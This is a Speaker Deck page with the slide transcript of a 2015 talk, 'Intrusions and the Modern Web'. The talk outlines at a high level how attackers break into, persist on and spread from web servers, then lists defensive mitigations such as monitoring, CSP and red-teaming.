Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intrusions and the Modern Web
Search
Benjamin Scott
November 23, 2015
Technology
1
130
Intrusions and the Modern Web
how and why bad guys break into servers
Benjamin Scott
November 23, 2015
Tweet
Share
More Decks by Benjamin Scott
See All by Benjamin Scott
Practical Cross-Side Request Forgery
benjaminxscott
0
53
Starting your Infosec Career
benjaminxscott
0
380
Lie To Me: Mitigating Intrusions using Deception
benjaminxscott
0
75
Internet Security for Everyone
benjaminxscott
1
63
Beneath the Radar: covert traffic on the web
benjaminxscott
0
84
Securing your company's networks
benjaminxscott
0
77
Internet Forensics 101
benjaminxscott
0
72
Intro to Binary Analysis
benjaminxscott
0
53
Analyzing Evil PDF Files with peepdf
benjaminxscott
0
200
Other Decks in Technology
See All in Technology
Kubernetes self-healing of your workload
hwchiu
0
550
知覚とデザイン
rinchoku
1
590
SOTA競争から人間を超える画像認識へ
shinya7y
0
550
.NET 10のBlazorの期待の新機能
htkym
0
110
Okta Identity Governanceで実現する最小権限の原則 / Implementing the Principle of Least Privilege with Okta Identity Governance
tatsumin39
0
170
FinOps について (ちょっと) 本気出して考えてみた
skmkzyk
0
220
可観測性は開発環境から、開発環境にもオブザーバビリティ導入のススメ
layerx
PRO
1
550
ストレージエンジニアの仕事と、近年の計算機について / 第58回 情報科学若手の会
pfn
PRO
3
850
ソースを読む時の思考プロセスの例-MkDocs
sat
PRO
1
220
Open Table Format (OTF) が必要になった背景とその機能 (2025.10.28)
simosako
2
300
Azureコストと向き合った、4年半のリアル / Four and a half years of dealing with Azure costs
aeonpeople
1
300
CNCFの視点で捉えるPlatform Engineering - 最新動向と展望 / Platform Engineering from the CNCF Perspective
hhiroshell
0
140
Featured
See All Featured
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
36
6.1k
Documentation Writing (for coders)
carmenintech
75
5.1k
Imperfection Machines: The Place of Print at Facebook
scottboms
269
13k
Being A Developer After 40
akosma
91
590k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
How STYLIGHT went responsive
nonsquared
100
5.9k
Code Reviewing Like a Champion
maltzj
526
40k
KATA
mclloyd
PRO
32
15k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
508
140k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
285
14k
What's in a price? How to price your products and services
michaelherold
246
12k
GitHub's CSS Performance
jonrohan
1032
470k
Transcript
Intrusions and the Modern Web Benjamin Scott
[email protected]
The Modern Web Threat model high - organized e-crime /
espionage groups Risk profile high - web developers want features / uptime Defense budget low - until breach hits the news
Goal of Intrusions Liquid assets credit cards / incoming traffic
/ hosting Enterprise access non-segmented network / shared admin Great visibility build profile of visitors who trust the site
Intrusion Lifecycle Break In find and exploit websec / appsec
issue Dig In install persistent backdoor Spread Out rinse and repeat
Break In Choose target highly trafficked / VIPs of interest
Try bruteforce default admin / SQLi / file inclusion Use exploit vulnerable service / CMS
(really) Break In Steal creds phish admins / keylog home
machines Buy access hire mercenaries / logins from underground SIGINT Use active MITM to inject binaries
Dig In Install webshell e-crime - PHP shells CN: Shell
Crew - ASP shells RU: Crouching Yeti - JavaScript patchwork RU: APT28 - custom kit with analytics Keep access local privilege escalation / new accounts
Spread Out Identify victims profile visitors / validate VIPs Deliver
exploits serve up tailored exploit Relay traffic implant commands sent via covert channel
Mitigations Monitoring new referers / odd scripts / insecure configs
Agile response share tools between operations / security / IT Clean deploys test appsec for CI / hardened images / CSP Hygiene checks scan / honeyclient / red team your site
Thanks for listening Benjamin Scott
[email protected]
github.com/benjaminxscott about.me/benjaminxscott